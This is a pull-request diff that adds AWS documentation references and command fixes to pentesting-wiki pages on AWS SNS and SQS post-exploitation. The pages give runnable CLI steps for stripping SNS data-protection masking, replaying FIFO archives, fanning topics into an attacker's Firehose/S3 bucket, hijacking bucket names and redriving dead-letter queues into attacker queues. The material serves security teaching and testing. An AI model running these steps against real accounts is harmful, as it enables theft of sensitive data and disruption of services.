### PR TITLE
Normalize references for cloud pages batch 7

### DIFF
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-data-protection-bypass.md
@@ -1,12 +1,12 @@
 # AWS - SNS Message Data Protection Bypass via Policy Downgrade
 
-{{#include ../../../../banners/hacktricks-training.md}}
+If you have `sns:PutDataProtectionPolicy` on a topic, you can replace an outbound Deidentify/Deny policy with an inbound Audit policy—or remove the policy—to leave no outbound mask or block. SNS defines Inbound for Publish requests and Outbound for notification deliveries; Audit does not interrupt publishing or delivery, while Deidentify masks or redacts and Deny blocks or fails delivery, so sensitive values such as credit card numbers can reach a subscription unmodified when the outbound control is gone.<sup>[[1]](#references)[[3]](#references)[[5]](#references)[[7]](#references)</sup>
 
-If you have `sns:PutDataProtectionPolicy` on a topic, you can switch its Message Data Protection policy from Deidentify/Deny to Audit-only (or remove Outbound controls) so sensitive values (e.g., credit card numbers) are delivered unmodified to your subscription.
+> **Availability note:** AWS says SNS Message Data Protection is no longer available to new customers. This procedure therefore applies only where the feature is already available or configured.<sup>[[6]](#references)</sup>
 
 ## Requirements
-- Permissions on the target topic to call `sns:PutDataProtectionPolicy` (and usually `sns:Subscribe` if you want to receive the data).
-- Standard SNS topic (Message Data Protection supported).
+- The identity needs `sns:PutDataProtectionPolicy`; `sns:Subscribe` is also needed when creating the subscription used to receive the data.<sup>[[1]](#references)</sup>
+- A standard SNS topic (Message Data Protection supports standard topics only).<sup>[[2]](#references)</sup>
 
 ## Attack Steps
 
@@ -16,17 +16,22 @@ If you have `sns:PutDataProtectionPolicy` on a topic, you can switch its Message
   REGION=us-east-1
   ```
 
-1) Create a standard topic and an attacker SQS queue, and allow only this topic to send to the queue
+1) Create a standard topic and an attacker SQS queue, then restrict the queue policy so only this topic can send to it. SNS requires an SQS queue policy granting `sqs:SendMessage` to the topic and recommends an `aws:SourceArn` condition.<sup>[[4]](#references)[[9]](#references)</sup>
 
    ```bash
    TOPIC_ARN=$(aws sns create-topic --name ht-dlp-bypass-$(date +%s) --region $REGION --query TopicArn --output text)
    Q_URL=$(aws sqs create-queue --queue-name ht-dlp-exfil-$(date +%s) --region $REGION --query QueueUrl --output text)
    Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)
 
-   aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes Policy=Version:2012-10-17
+   cat > /tmp/ht-sqs-attributes.json <<JSON
+   {
+     "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Sid\":\"AllowSNSTopic\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"sns.amazonaws.com\"},\"Action\":\"sqs:SendMessage\",\"Resource\":\"$Q_ARN\",\"Condition\":{\"ArnEquals\":{\"aws:SourceArn\":\"$TOPIC_ARN\"}}}]}"
+   }
+   JSON
+   aws sqs set-queue-attributes --queue-url "$Q_URL" --region $REGION --attributes file:///tmp/ht-sqs-attributes.json
    ```
 
-2) Attach a data protection policy that masks credit card numbers on outbound messages
+2) Attach a data protection policy that masks credit card numbers on outbound messages. The policy uses an outbound `Deidentify` statement with the managed `CreditCardNumber` data identifier and `#` mask character; `PutDataProtectionPolicy` accepts the JSON policy document for the target topic.<sup>[[3]](#references)[[5]](#references)[[8]](#references)</sup>
 
    ```bash
    cat > /tmp/ht-dlp-policy.json <<'JSON'
@@ -45,7 +50,7 @@ If you have `sns:PutDataProtectionPolicy` on a topic, you can switch its Message
    aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-policy.json)"
    ```
 
-3) Subscribe attacker queue and publish a message with a test CC number, verify masking
+3) Subscribe attacker queue and publish a message with a test CC number, then verify masking. The queue policy above authorizes SNS delivery, and an owner-created same-account SQS subscription is normally active immediately.<sup>[[4]](#references)</sup>
 
    ```bash
    SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$TOPIC_ARN" --protocol sqs --notification-endpoint "$Q_ARN" --query SubscriptionArn --output text)
@@ -53,30 +58,17 @@ If you have `sns:PutDataProtectionPolicy` on a topic, you can switch its Message
    aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
    ```
 
-Expected excerpt shows masking (hashes):
+SNS's outbound Deidentify operation masks sensitive data in delivered messages, so the expected excerpt shows hashes in place of the test number.<sup>[[5]](#references)</sup>
 
 ```json
 "Message" : "payment:{cc:################}"
 ```
 
-4) Downgrade the policy to audit-only (no deidentify/deny statements affecting Outbound)
+4) Downgrade the policy to audit-only (with no Deidentify/Deny statements affecting Outbound), or remove the policy for a self-contained lab
 
-For SNS, Audit statements must be Inbound. Replacing the policy with an Audit-only Inbound statement removes any Outbound de-identification, so messages flow unmodified to subscribers.
+For SNS, Audit samples inbound messages and requires a configured findings or no-findings destination; an empty `NoFindingsDestination` object is not a runnable audit policy. Replacing the policy with a valid Audit-only Inbound statement removes any Outbound de-identification, so messages flow unmodified to subscribers. If no audit destination is already available, delete the policy as shown below; AWS documents the empty policy string as the CLI deletion method.<sup>[[3]](#references)[[5]](#references)[[7]](#references)</sup>
    ```bash
-   cat > /tmp/ht-dlp-audit-only.json <<'JSON'
-   {
-     "Name": "__ht_dlp_policy",
-     "Version": "2021-06-01",
-     "Statement": [{
-       "Sid": "AuditInbound",
-       "Principal": ["*"],
-       "DataDirection": "Inbound",
-       "DataIdentifier": ["arn:aws:dataprotection::aws:data-identifier/CreditCardNumber"],
-       "Operation": { "Audit": { "SampleRate": 99, "NoFindingsDestination": {} } }
-     }]
-   }
-   JSON
-   aws sns put-data-protection-policy --region $REGION --resource-arn "$TOPIC_ARN" --data-protection-policy "$(cat /tmp/ht-dlp-audit-only.json)"
+   aws sns put-data-protection-policy --region "$REGION" --resource-arn "$TOPIC_ARN" --data-protection-policy ""
    ```
 
 5) Publish the same message and verify the unmasked value is delivered
@@ -84,13 +76,25 @@ For SNS, Audit statements must be Inbound. Replacing the policy with an Audit-on
    aws sns publish --region $REGION --topic-arn "$TOPIC_ARN" --message payment:{cc:4539894458086459}
    aws sqs receive-message --queue-url "$Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 15 --message-attribute-names All --attribute-names All
    ```
-Expected excerpt shows cleartext CC:
+With no outbound data-protection operation remaining, the expected excerpt shows the cleartext test number.<sup>[[3]](#references)[[7]](#references)</sup>
 
 ```text
 4539894458086459
 ```
 
 ## Impact
-- Switching a topic from de-identification/deny to audit-only (or otherwise removing Outbound controls) allows PII/secrets to pass through unmodified to attacker-controlled subscriptions, enabling data exfiltration that would otherwise be masked or blocked.
+- Switching a topic from de-identification/deny to audit-only (or otherwise removing Outbound controls) allows PII/secrets to pass through unmodified to attacker-controlled subscriptions, enabling data exfiltration that would otherwise be masked or blocked.<sup>[[2]](#references)[[3]](#references)</sup>
+
+## References
+
+- [1] [Amazon SNS API permissions: Actions and resources reference](https://docs.aws.amazon.com/sns/latest/dg/sns-access-policy-language-api-permissions-reference.html)
+- [2] [Message data protection in Amazon SNS](https://docs.aws.amazon.com/sns/latest/dg/message-data-protection.html)
+- [3] [Understanding Amazon SNS data protection policies](https://docs.aws.amazon.com/sns/latest/dg/sns-message-data-protection-policies.html)
+- [4] [Subscribing an Amazon SQS queue to an Amazon SNS topic](https://docs.aws.amazon.com/sns/latest/dg/subscribe-sqs-queue-to-sns-topic.html)
+- [5] [Data protection policy operations in Amazon SNS](https://docs.aws.amazon.com/sns/latest/dg/sns-message-data-protection-operations.html)
+- [6] [Amazon SNS message data protection availability change](https://docs.aws.amazon.com/sns/latest/dg/sns-message-data-protection-availability-change.html)
+- [7] [Deleting data protection policies in Amazon SNS](https://docs.aws.amazon.com/sns/latest/dg/sns-message-data-protection-delete.html)
+- [8] [put-data-protection-policy — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/put-data-protection-policy.html)
+- [9] [set-queue-attributes — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/set-queue-attributes.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-fifo-replay-exfil.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-fifo-replay-exfil.md
@@ -1,34 +1,35 @@
 # SNS FIFO Archive Replay Exfiltration via Attacker SQS FIFO Subscription
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
-Abuse of Amazon SNS FIFO topic message archiving to replay and exfiltrate previously published messages to an attacker-controlled SQS FIFO queue by setting the subscription ReplayPolicy.
+Amazon SNS FIFO topics can archive published messages with `ArchivePolicy`; a subscriber can use a `ReplayPolicy` to replay archived messages to its endpoint, including messages published before that subscription existed. Replayed messages include the `Replayed` attribute in the SNS notification.<sup>[[1]](#references)[[2]](#references)</sup>
 
 - Service: Amazon SNS (FIFO topics) + Amazon SQS (FIFO queues)
-- Requirements: Topic must have ArchivePolicy enabled (message archiving). Attacker can Subscribe to the topic and set attributes on their subscription. Attacker controls an SQS FIFO queue and allows the topic to send messages.
-- Impact: Historical messages (published before the subscription) can be delivered to the attacker endpoint. Replayed deliveries are flagged with Replayed=true in the SNS envelope.
+- Requirements: The target topic must have `ArchivePolicy` enabled, the attacker must be allowed to subscribe and modify the resulting subscription, and the attacker must control an SQS FIFO queue whose resource policy permits SNS delivery.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
+- Impact: Historical messages can be delivered to the attacker endpoint; with the default SQS delivery format, the notification envelope exposes the replay marker alongside SNS metadata.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ## Preconditions
-- SNS FIFO topic with archiving enabled: `ArchivePolicy` (e.g., `{ "MessageRetentionPeriod": "2" }` for 2 days).
+- SNS FIFO topic with archiving enabled: `ArchivePolicy` (e.g., `{ "MessageRetentionPeriod": "2" }` for 2 days). Message archiving is available for application-to-application FIFO topics, with retention from 1 to 365 days.<sup>[[1]](#references)</sup>
 - Attacker has permissions to:
-  - `sns:Subscribe` on the target topic.
-  - `sns:SetSubscriptionAttributes` on the created subscription.
-- Attacker has an SQS FIFO queue and can attach a queue policy allowing `sns:SendMessage` from the topic ARN.
+  - `sns:Subscribe` on the target topic.<sup>[[2]](#references)</sup>
+  - `sns:SetSubscriptionAttributes` on the created subscription.<sup>[[2]](#references)</sup>
+- Attacker has an SQS FIFO queue and can attach a queue policy allowing the SNS service principal to call `sqs:SendMessage` from the topic ARN.<sup>[[3]](#references)</sup>
 
 ## Minimum IAM permissions
-- On topic: `sns:Subscribe`.
-- On subscription: `sns:SetSubscriptionAttributes`.
-- On queue: `sqs:SetQueueAttributes` for policy, and queue policy permitting `sns:SendMessage` from the topic ARN.
+- On topic: `sns:Subscribe`; `sns:GetTopicAttributes` is also needed when the replay start is discovered with the CLI query in the POC.<sup>[[1]](#references)[[2]](#references)</sup>
+- On subscription: `sns:SetSubscriptionAttributes`.<sup>[[2]](#references)</sup>
+- On queue: `sqs:SetQueueAttributes` to install the resource policy; the policy must permit SNS to call `sqs:SendMessage` from the topic ARN.<sup>[[3]](#references)</sup>
+- To run the self-contained setup and receive output, also grant `sns:CreateTopic`, `sns:Publish`, `sqs:CreateQueue`, `sqs:GetQueueAttributes`, and `sqs:ReceiveMessage`; these are not required when the topic and queue already exist and are preconfigured.<sup>[[1]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ## Attack: Replay archived messages to attacker SQS FIFO
-The attacker subscribes their SQS FIFO queue to the victim SNS FIFO topic, then sets the `ReplayPolicy` to a timestamp in the past (within the archive retention window). SNS immediately replays matching archived messages to the new subscription and marks them with `Replayed=true`.
+The attacker subscribes their SQS FIFO queue to the victim SNS FIFO topic, then sets the `ReplayPolicy` to a timestamp in the past (within the archive retention window). SNS can replay matching archived messages immediately after the subscription is created and marks them with `Replayed=true`.<sup>[[2]](#references)</sup>
 
 Notes:
-- The timestamp used in `ReplayPolicy` must be >= the topic's `BeginningArchiveTime`. If it's earlier, the API returns `Invalid StartingPoint value`.
-- For SNS FIFO `Publish`, you must specify a `MessageGroupId` (and either dedup ID or enable `ContentBasedDeduplication`).
+- The timestamp used in `ReplayPolicy` must be at or after the topic's `BeginningArchiveTime`; query that value with `GetTopicAttributes` rather than assuming a clock value.<sup>[[1]](#references)</sup>
+- For SNS FIFO `Publish`, specify a `MessageGroupId` and provide a `MessageDeduplicationId` unless `ContentBasedDeduplication` is enabled.<sup>[[4]](#references)</sup>
 
 <details>
 <summary>End-to-end CLI POC (us-east-1)</summary>
+
+The following POC creates a test topic and queue, publishes three messages before subscribing, configures replay from the archive start, and reads the SQS notification envelope. Use it only in an authorized test account; replace the setup and publish steps with an existing target only when the stated permissions are legitimately held.
 
 ```bash
 REGION=us-east-1
@@ -57,6 +58,7 @@ done
 # 3) Create attacker SQS FIFO queue and allow only this topic to send
 Q_URL=$(aws sqs create-queue --queue-name ht-replay-exfil-q-$(date +%s).fifo \
   --attributes FifoQueue=true --region "$REGION" --query QueueUrl --output text)
+export Q_URL
 Q_ARN=$(aws sqs get-queue-attributes --queue-url "$Q_URL" --region "$REGION" \
   --attribute-names QueueArn --query Attributes.QueueArn --output text)
 
@@ -97,6 +99,13 @@ aws sqs receive-message --queue-url "$Q_URL" --region "$REGION" \
 </details>
 
 ## Impact
-**Potential Impact**: An attacker who can subscribe to an SNS FIFO topic with archiving enabled and set `ReplayPolicy` on their subscription can immediately replay and exfiltrate historical messages published to that topic, not only messages sent after the subscription was created. Delivered messages include a `Replayed=true` flag in the SNS envelope.
+**Potential Impact**: An attacker who is authorized to subscribe to an archived SNS FIFO topic and modify their subscription can replay historical messages to an attacker-controlled queue, not just messages published after the subscription. In the default SNS-to-SQS notification format, each replayed delivery carries the `Replayed` marker in the SNS envelope.<sup>[[2]](#references)[[3]](#references)</sup>
+
+## References
+
+- [1] [Amazon SNS message archiving for FIFO topic owners](https://docs.aws.amazon.com/sns/latest/dg/message-archiving-and-replay-topic-owner.html)
+- [2] [Amazon SNS message replay for FIFO topic subscribers](https://docs.aws.amazon.com/sns/latest/dg/message-archiving-and-replay-subscriber.html)
+- [3] [Subscribing an Amazon SQS queue to an Amazon SNS topic](https://docs.aws.amazon.com/sns/latest/dg/subscribe-sqs-queue-to-sns-topic.html)
+- [4] [Publishing an Amazon SNS message](https://docs.aws.amazon.com/sns/latest/dg/sns-publishing.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-firehose-exfil.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation/aws-sns-firehose-exfil.md
@@ -1,15 +1,17 @@
 # AWS - SNS to Kinesis Firehose Exfiltration (Fanout to S3)
 
-{{#include ../../../../banners/hacktricks-training.md}}
+Amazon SNS supports a `firehose` subscription whose endpoint is a Kinesis Data Firehose delivery-stream ARN. The subscription requires a role trusted by `sns.amazonaws.com` with permission to write to that stream; Firehose separately assumes a delivery role with S3 permissions. Firehose buffers records into S3 objects and retries DirectPut S3 delivery for up to 24 hours, so this path can persist messages but delivery is not guaranteed if failures outlast retention.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[9]](#references)</sup>
 
-Abuse the Firehose subscription protocol to register an attacker-controlled Kinesis Data Firehose delivery stream on a victim SNS standard topic. Once the subscription is in place and the required IAM role trusts `sns.amazonaws.com`, every future notification is durably written into the attacker’s S3 bucket with minimal noise.
+Used offensively, this lets an attacker attach an attacker-controlled delivery stream to a victim standard topic.<sup>[[1]](#references)[[2]](#references)</sup> The managed path can be relatively low-noise because no publisher code or publishing client configuration needs to change.
 
 ## Requirements
-- Permissions in the attacker account to create an S3 bucket, Firehose delivery stream, and the IAM role used by Firehose (`firehose:*`, `iam:CreateRole`, `iam:PutRolePolicy`, `s3:PutBucketPolicy`, etc.).
-- The ability to `sns:Subscribe` to the victim topic (and optionally `sns:SetSubscriptionAttributes` if the subscription role ARN is provided after creation).
-- A topic policy that allows the attacker principal to subscribe (or the attacker already operates inside the same account).
+- Permissions in the attacker account to create an S3 bucket, Firehose delivery stream, and the IAM roles and policies used by SNS and Firehose (`firehose:*`, `iam:CreateRole`, `iam:PutRolePolicy`, `s3:PutBucketPolicy`, etc.). The exact policy can be narrowed to the resources and actions used by the procedure.<sup>[[3]](#references)</sup>
+- The ability to `sns:Subscribe` to the victim topic and, if the role ARN is supplied after creation, `sns:SetSubscriptionAttributes`.<sup>[[2]](#references)[[8]](#references)</sup>
+- A topic policy that allows the attacker principal to subscribe (or the attacker already operates inside the same account). SNS topic policies can grant topic actions to principals in other AWS accounts.<sup>[[5]](#references)</sup>
 
 ## Attack Steps (same-account example)
+
+The commands below use the documented two-role arrangement: SNS assumes one role to call `PutRecord`/`PutRecordBatch` on the Firehose stream, while Firehose assumes a separate role to write to the S3 destination.<sup>[[1]](#references)[[3]](#references)</sup>
 
 ```bash
 REGION=us-east-1
@@ -69,15 +71,19 @@ sleep 90
 aws s3 ls s3://$ATTACKER_BUCKET/ --recursive
 ```
 
+The `sleep 90` check is only a convenience for this example; Firehose writes buffered records according to the stream's buffering configuration, so object availability can vary.<sup>[[9]](#references)</sup>
+
 ## Cleanup
 - Delete the SNS subscription, Firehose delivery stream, temporary IAM roles/policies, and attacker S3 bucket.
 
 ## Impact
-**Potential Impact**: Continuous, durable exfiltration of every message published to the targeted SNS topic into attacker-controlled storage with minimal operational footprint.
+**Potential Impact**: If the subscription remains active and delivery succeeds, messages published to the targeted SNS topic are continuously buffered and written to attacker-controlled S3 storage. Delivery remains subject to subscription filters, delivery errors, and Firehose retention.<sup>[[1]](#references)[[4]](#references)[[9]](#references)</sup>
+
+Because this uses managed delivery resources, it can have a relatively low operational footprint from the publisher's perspective.
 
 ## Related Bucket-Name Hijack Variant
 
-If an existing SNS -> Firehose -> S3 chain already writes to a bucket and the attacker can delete that bucket, they may be able to recreate the same globally-unique S3 bucket name in an attacker-controlled account. Future Firehose deliveries can then land in the replacement bucket without changing the SNS subscription or Firehose stream configuration.
+If an existing SNS -> Firehose -> S3 chain already writes to a general purpose bucket and the attacker can delete that bucket, the attacker may be able to recreate the same name in an attacker-controlled account after it becomes available. Because the Firehose S3 destination identifies the bucket by ARN and cross-account delivery can be authorized with a bucket policy, future deliveries may land in the replacement bucket without changing the SNS subscription or Firehose stream configuration; this depends on the name becoming available and the replacement bucket granting the existing Firehose role access.<sup>[[3]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 # Identify the Firehose S3 destination
@@ -89,6 +95,18 @@ aws firehose describe-delivery-stream \
 aws s3 mb s3://<BUCKET_NAME> --region <REGION>
 ```
 
-Grant the Firehose delivery role access to the replacement bucket if the role can write cross-account. Monitor for bucket deletion on Firehose destinations, delivery failures, and unexpected bucket ownership changes.
+For cross-account delivery, grant the existing Firehose delivery role the required S3 permissions in the replacement bucket policy; AWS documents `s3:PutObjectAcl` as required for cross-account Firehose delivery. Monitor for bucket deletion on Firehose destinations, delivery failures, and unexpected bucket ownership changes.<sup>[[3]](#references)[[6]](#references)[[7]](#references)</sup>
+
+## References
+
+- [1] [Prerequisites for subscribing Firehose delivery streams to Amazon SNS topics](https://docs.aws.amazon.com/sns/latest/dg/prereqs-kinesis-data-firehose.html)
+- [2] [Subscribe - Amazon Simple Notification Service API Reference](https://docs.aws.amazon.com/sns/latest/api/API_Subscribe.html)
+- [3] [Controlling access with Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/controlling-access.html)
+- [4] [Handle data delivery failures - Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/retry.html)
+- [5] [Using identity-based policies with Amazon SNS](https://docs.aws.amazon.com/sns/latest/dg/sns-using-identity-based-policies.html)
+- [6] [S3DestinationConfiguration - Amazon Data Firehose API Reference](https://docs.aws.amazon.com/firehose/latest/APIReference/API_S3DestinationConfiguration.html)
+- [7] [General purpose bucket naming rules - Amazon Simple Storage Service](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucketnamingrules.html)
+- [8] [set-subscription-attributes - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sns/set-subscription-attributes.html)
+- [9] [Understand data delivery in Amazon Data Firehose](https://docs.aws.amazon.com/firehose/latest/dev/basic-deliver.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - SQS Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## SQS
 
 For more information check:
@@ -10,9 +8,9 @@ For more information check:
 ../../aws-services/aws-sqs-and-sns-enum.md
 {{#endref}}
 
-### `sqs:SendMessage` , `sqs:SendMessageBatch`
+### `sqs:SendMessage` (API: `SendMessage`, `SendMessageBatch`)
 
-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
+An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
 ```bash
 aws sqs send-message --queue-url <value> --message-body <value>
@@ -23,7 +21,7 @@ aws sqs send-message-batch --queue-url <value> --entries <value>
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
+An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)</sup>
 
 ```bash
 aws sqs receive-message --queue-url <value>
@@ -35,7 +33,7 @@ aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> -
 
 ### `sqs:DeleteQueue`
 
-An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
+An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ```bash
 aws sqs delete-queue --queue-url <value>
@@ -45,7 +43,7 @@ aws sqs delete-queue --queue-url <value>
 
 ### `sqs:PurgeQueue`
 
-An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
+An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.<sup>[[1]](#references)[[8]](#references)</sup>
 
 ```bash
 aws sqs purge-queue --queue-url <value>
@@ -55,7 +53,7 @@ aws sqs purge-queue --queue-url <value>
 
 ### `sqs:SetQueueAttributes`
 
-An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability.
+An attacker could modify queue attributes such as its policy, delivery delay, or message-retention settings, potentially affecting its performance, security, or availability.<sup>[[1]](#references)[[9]](#references)</sup>
 
 ```bash
 aws sqs set-queue-attributes --queue-url <value> --attributes <value>
@@ -65,7 +63,7 @@ aws sqs set-queue-attributes --queue-url <value> --attributes <value>
 
 ### `sqs:TagQueue` , `sqs:UntagQueue`
 
-An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
+An attacker could add or overwrite tags on an SQS queue, or remove them, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.<sup>[[1]](#references)[[10]](#references)[[11]](#references)</sup>
 
 ```bash
 aws sqs tag-queue --queue-url <value> --tags Key=<key>,Value=<value>
@@ -76,7 +74,7 @@ aws sqs untag-queue --queue-url <value> --tag-keys <key>
 
 ### `sqs:RemovePermission`
 
-An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
+An attacker could revoke queue-policy permissions for legitimate users or services by removing entries that match a supplied permission label. This could lead to disruptions in the normal functioning of applications that rely on the queue.<sup>[[1]](#references)[[12]](#references)</sup>
 
 ```bash
 aws sqs remove-permission --queue-url <value> --label <value>
@@ -94,6 +92,19 @@ aws-sqs-dlq-redrive-exfiltration.md
 aws-sqs-sns-injection.md
 {{#endref}}
 
+## References
+
+- [1] [Actions, resources, and condition keys for Amazon SQS](https://docs.aws.amazon.com/service-authorization/latest/reference/list_sqs.html)
+- [2] [send-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message.html)
+- [3] [send-message-batch — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/send-message-batch.html)
+- [4] [receive-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/receive-message.html)
+- [5] [delete-message — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/delete-message.html)
+- [6] [change-message-visibility — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/change-message-visibility.html)
+- [7] [delete-queue — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/delete-queue.html)
+- [8] [purge-queue — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/purge-queue.html)
+- [9] [set-queue-attributes — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/set-queue-attributes.html)
+- [10] [tag-queue — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/tag-queue.html)
+- [11] [untag-queue — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/untag-queue.html)
+- [12] [remove-permission — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/sqs/remove-permission.html)
+
 {{#include ../../../../banners/hacktricks-training.md}}
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation/aws-sqs-dlq-redrive-exfiltration.md
@@ -1,16 +1,14 @@
 # AWS – SQS DLQ Redrive Exfiltration via StartMessageMoveTask
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Description
 
-Abuse SQS message move tasks to steal all accumulated messages from a victim's Dead-Letter Queue (DLQ) by redirecting them to an attacker-controlled queue using `sqs:StartMessageMoveTask`. This technique exploits AWS's legitimate message recovery feature to exfiltrate sensitive data that has accumulated in DLQs over time.
+Abuse SQS message move tasks to move accumulated messages from a victim's Dead-Letter Queue (DLQ) to an attacker-controlled queue using `sqs:StartMessageMoveTask`. AWS exposes this as an asynchronous redrive operation with an optional custom destination queue; using an attacker-controlled destination turns the recovery feature into a bulk data-transfer primitive.<sup>[[1]](#references)</sup>
 
 ## What is a Dead-Letter Queue (DLQ)?
 
-A Dead-Letter Queue is a special SQS queue where messages are automatically sent when they fail to be processed successfully by the main application. These failed messages often contain:
+A Dead-Letter Queue is a special SQS queue where messages are automatically sent when they fail to be processed successfully by the main application.<sup>[[3]](#references)</sup> These failed messages often contain:
 - Sensitive application data that couldn't be processed
-- Error details and debugging information  
+- Error details and debugging information
 - Personal Identifiable Information (PII)
 - API tokens, credentials, or other secrets
 - Business-critical transaction data
@@ -19,41 +17,46 @@ DLQs act as a "graveyard" for failed messages, making them valuable targets sinc
 
 ## Attack Scenario
 
-**Real-world example:**
+**Illustrative example:**
 1. **E-commerce application** processes customer orders through SQS
 2. **Some orders fail** (payment issues, inventory problems, etc.) and get moved to a DLQ
 3. **DLQ accumulates** weeks/months of failed orders containing customer data: `{"customerId": "12345", "creditCard": "4111-1111-1111-1111", "orderTotal": "$500"}`
 4. **Attacker gains access** to AWS credentials with SQS permissions
 5. **Attacker discovers** the DLQ contains thousands of failed orders with sensitive data
-6. **Instead of trying to access individual messages** (slow and obvious), attacker uses `StartMessageMoveTask` to bulk transfer ALL messages to their own queue
+6. **Instead of trying to access individual messages** (slow and obvious), attacker uses `StartMessageMoveTask` to bulk transfer the accumulated messages to their own queue<sup>[[1]](#references)</sup>
 7. **Attacker extracts** all historical sensitive data in one operation
 
 ## Requirements
-- The source queue must be configured as a DLQ (referenced by at least one queue RedrivePolicy).
+- The source queue must be configured as a DLQ for an SQS source queue. The API only accepts DLQs whose sources are other Amazon SQS queues.<sup>[[1]](#references)</sup>
 - IAM permissions (run as the compromised victim principal):
-  - On DLQ (source): `sqs:StartMessageMoveTask`, `sqs:GetQueueAttributes`.
-  - On destination queue: permission to deliver messages (e.g., queue policy allowing `sqs:SendMessage` from the victim principal). For same-account destinations this is typically allowed by default.
-  - If SSE-KMS is enabled: on source CMK `kms:Decrypt`, and on destination CMK `kms:GenerateDataKey`, `kms:Encrypt`.
+  - On the DLQ (source): `sqs:StartMessageMoveTask`, `sqs:ReceiveMessage`, `sqs:DeleteMessage`, and `sqs:GetQueueAttributes`.<sup>[[2]](#references)</sup>
+  - To monitor or stop the task: `sqs:ListMessageMoveTasks` and, if needed, `sqs:CancelMessageMoveTask` on the DLQ.<sup>[[2]](#references)</sup>
+  - On the destination queue: `sqs:SendMessage`; the harvesting commands need `sqs:ReceiveMessage` and, if messages are deleted after processing, `sqs:DeleteMessage`. The discovery and creation commands shown below additionally need `sqs:ListQueues`, `sqs:CreateQueue`, and `sqs:GetQueueAttributes` as applicable.<sup>[[2]](#references)[[6]](#references)</sup>
+  - If SSE-KMS is enabled: `kms:Decrypt` on the DLQ or original source queue's CMK, and `kms:GenerateDataKey` plus `kms:Decrypt` on the destination CMK.<sup>[[2]](#references)</sup>
+
